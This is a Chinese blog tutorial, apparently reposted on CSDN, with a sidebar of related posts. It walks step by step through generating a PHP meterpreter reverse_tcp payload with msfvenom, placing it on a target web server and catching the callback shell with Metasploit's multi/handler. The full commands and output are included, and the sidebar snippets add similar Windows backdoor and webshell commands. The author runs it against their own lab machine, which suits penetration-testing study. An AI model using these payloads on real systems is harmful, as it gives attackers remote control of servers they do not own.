Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程

最新推荐文章于 2024-05-02 04:37:51 发布
最新推荐文章于 2024-05-02 04:37:51 发布
阅读量2.8k 收藏 6
点赞数 2
分类专栏: msf
原文链接:https://www.fujieace.com/kali-linux/meterpreter-reverse_tcp-handler.html
版权

由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103;

我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1.103;如下图:

 

目标机:192.168.1.103

攻击机:192.168.40.132

 

一、生成一个payload

由于我们搭建的是PHP网站,这里我就直接用“msfvenom”来生成一个PHP的payload。当然,你也可以生成其它类型的,例如:Python、JavaScript、Linux、Java、Android、Windows等等。

命令如下:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.40.132 LPORT=168 -f raw -o /root/x.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
Saved as: /root/x.php

注意:以上是直接以 raw 的形式保存成文件,只要目标进行了访问,就会反弹回 shell 。

 

二、将以上生成的payload放到目标机器并让其执行

我这里就直接把“/root/x.php”放到“192.168.1.103”网站根目录下吧,并用浏览器打开“192.168.1.103/x.php”网页。显示以下效果,说明还没有socket连接!

 

三、配置一个反弹shell会话处理程序

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.40.132
LHOST => 192.168.40.132
msf exploit(multi/handler) > set LPORT 168
LPORT => 168
msf exploit(multi/handler) > exploit

 

当目标机器成功执行“192.168.1.103/x.php”这个payload后我们就取得了一个 meterpreter shell,由于我们是PHP网站实战,因此这个“192.168.1.103/x.php”谁去执行都可以,只要你能打开它。

 

四、meterpreter shell权限

我们可以通过命令“getuidsysinfoshell”等来做不同的操作。具体就不详细讲解了,总之一句话,现在我们已经得到了192.168.1.103的shell了。

 

注意:由于我中途网络出了点问题,VM虚拟机连接不上网了,我做了一下”虚拟机网络编辑器 - 还原默认设置“,因此我的虚拟机IP由192.168.40.132变成了192.168.174.128;所以:后面的命令和图片有些对应不上,我也懒得改IP了。

cacheyu
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Kali系列之multi/handler(渗透win7)
weixin_34007879的博客
04-13 1206
环境 靶机 192.168.137.133 kali 192.168.137.135 步骤+ 生成后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe msfvenom -p windows/meterpreter...
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3269
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
MS16_016 漏洞利用与安全加固_exploit windows local ms16_016_webdav(1)
最新发布
2401_84281629的博客
05-02 594
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Kali-利用metasploitexploit/multi/handler进行攻击
热门推荐
齐泽文的Blog
04-22 1万+
攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole > use exploit/multi/handl...
MSF里侦听模块的使用教程 exploit/multi/handler
qq_45249394的博客
11-25 1万+
标题关于MSF侦听模块的第一次使用 侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了,不管外网内网都能反弹shell,就是windows10的防火墙过不去,windows7的查不到,可能不更新的原因吧。如果想过墙只能自己加免杀的代码喽,反正我是还没学到呢。或者去百度shellter下载剥壳机自己加免杀的,有两个版本免费版和专业版,本人亲测免费版过不了wind...
metasploitPayloadreverse_tcp和bind_tcp的区别
04-19 1万+
bind_tcpreverse_tcp这两者的执行过程可以d
meterpretermulti/handler
公众号shadow sock7
06-17 2630
参考: https://community.rapid7.com/thread/2083 In order to get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the e
deeplink-reverse-tcp:使用简单的Metasploit reverse_tcp有效负载,Microsoft Word和SettingContent-ms文件获得反向连接
05-24
反向链接需要的东西:Microsoft word(最好是较旧的版本),notepad / notepad ++,Kali vm,Windows reverse_tcp负载和Windows机器创建有效负载+命令和控制服务器设置在Kali Linux创建Windows / Meterpreter / ...
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
用于渗透测试、漏洞开发和漏洞恢复的Metasploit工具包
Exploit 编写系列教程第四篇_编写Metasploit exploit.pdf
07-06
Exploit 编写系列教程第四篇_编写Metasploit exploit.pdf
kali-linux 工具Metasploit离线式攻击使用教程
12-29
攻击实例讲解4-Metasploit离线式攻击.rar
metasploit-framework_6.1.2+20210821102555_1rapid7-1_amd64.deb
08-22
我希望能方便到你 网站原地址:https://apt.metasploit.com/ k
php Meterpreter Webshell
iteye_16188的博客
11-17 364
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php 2. 上传a.php到web服务器 3. 启动msfconsole 4. use multi/handler 5. set LHOST Attacker's_IP 6. set LPORT 443 7. set ...
Kali渗透测试:远程控制程序基础
Liu_Bruce的博客
05-07 3617
Kali渗透测试:远程控制程序基础 测试环境: 攻击机:Linux kali 5.16.0-kali (IP:192.168.68.248) 靶机:WinXP (IP:192.168.68.159) Win7 (IP:192.168.68.206) 1. 使用MSFPC生成被控端 远程控制软件的被控端和主控端必须是成对使用的。被控端运行在目标设备上,其功能挺起来和木马很像,实际上是如此,被控端(可以是一段代码,也可以是一个能直接执行的程序)。在Kali Li
msfvenom生成后台木马监听目标(windows渗透测试)
forget_mt的博客
12-06 8106
针对windows操作系统的渗透测试 操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。 实战: 一:后台木马生成 注意在代码LHOST:172.16.5.2与LPORT:4444 要根据实际情况来更改 LHOST设置为渗透机的ip LPORT设置为监听的端口,端口只要不是已经占用的就可以 msfvenom -a x86 --platform windows -p windows/m.
Metasploit 生成各种后门
CSDN
01-13 8629
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2853
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
MSF建立webshell后门,并监听端口建立session连接
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
渗透测试实战——prime靶机入侵
蚁景网安学院
09-26 381
Ip:192.168.0.115Kali:192.168.0.21安装好的靶机界面Nmap扫描端口【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相...
Invalid module: /meterpreter/reverse_http
06-02
这个错误通常是因为 Metasploit 模块缺少某些必需的依赖项或配置不正确造成的。请确保您的 Metasploit 模块已正确安装,且已按照要求配置了必需的依赖项。 此外,您也可以尝试在 Metasploit 手动创建一个反向 HTTP Meterpreter 会话,以确保您的系统配置正确。可以使用以下命令来创建一个反向 HTTP Meterpreter 会话: ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_http set LHOST <your local IP address> set LPORT <a local port to listen on> set ExitOnSession false exploit -j ``` 这将启动一个 Metasploit 处理程序,用于侦听您指定的 IP 地址和端口。接下来,您可以将 Meterpreter payload 部署到受攻击的目标上,以建立Metasploit 处理程序的反向连接。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值